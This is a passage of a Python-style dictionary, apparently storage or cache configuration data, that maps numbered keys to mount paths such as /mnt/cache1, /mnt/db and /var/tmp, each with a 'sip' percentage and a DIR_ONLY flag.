'8-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'8-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'8-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'8-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'8-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'8-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'8-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'4-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'6-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'9-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'6-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'3-13': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache13': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'3-12': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/cache12': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'3-11': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache11': {'sip': '100', 'DIR_ONLY': False}},
'3-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'6-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'6-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'2-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'5-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'2-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'2-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'2-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'2-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'2-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'2-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'2-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'2-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'0-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}},
'13-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'13-0': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': 'NA', 'DIR_ONLY': True},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/md': {'sip': 'NA', 'DIR_ONLY': True}},
'13-7': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-6': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}},
'13-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'13-4': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}},
'12-10': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache10': {'sip': '100', 'DIR_ONLY': False}},
'13-9': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache9': {'sip': '100', 'DIR_ONLY': False},
'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache4': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache5': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache6': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache7': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'13-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'0-5': {'/var/tmp': {'sip': 'NA', 'DIR_ONLY': True}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': 'NA', 'DIR_ONLY': True},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}},
'9-8': {'/mnt/cache8': {'sip': '100', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache5': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache6': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache7': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'4-1': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '50', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}},
'9-3': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache3': {'sip': '100', 'DIR_ONLY': False},
'/mnt/db': {'sip': '25', 'DIR_ONLY': False}, '/mnt/md': {'sip': '25', 'DIR_ONLY': False},
'/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-2': {'/mnt/bfs': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache1': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache2': {'sip': '75', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/var/tmp': {'sip': '100', 'DIR_ONLY': False}},
'9-5': {'/var/tmp': {'sip': '100', 'DIR_ONLY': False}, '/mnt/db': {'sip': '25', 'DIR_ONLY': False},
'/mnt/md': {'sip': '25', 'DIR_ONLY': False}, '/mnt/bfs': {'sip': '100', 'DIR_ONLY': False},
'/mnt/cache1': {'sip': '75', 'DIR_ONLY': False}, '/mnt/cache2': {'sip': '75', 'DIR_ONLY': False},
'/mnt/cache3': {'sip': '100', 'DIR_ONLY': False}, '/mnt/cache4': {'sip': '100', 'DIR_ONLY': False},
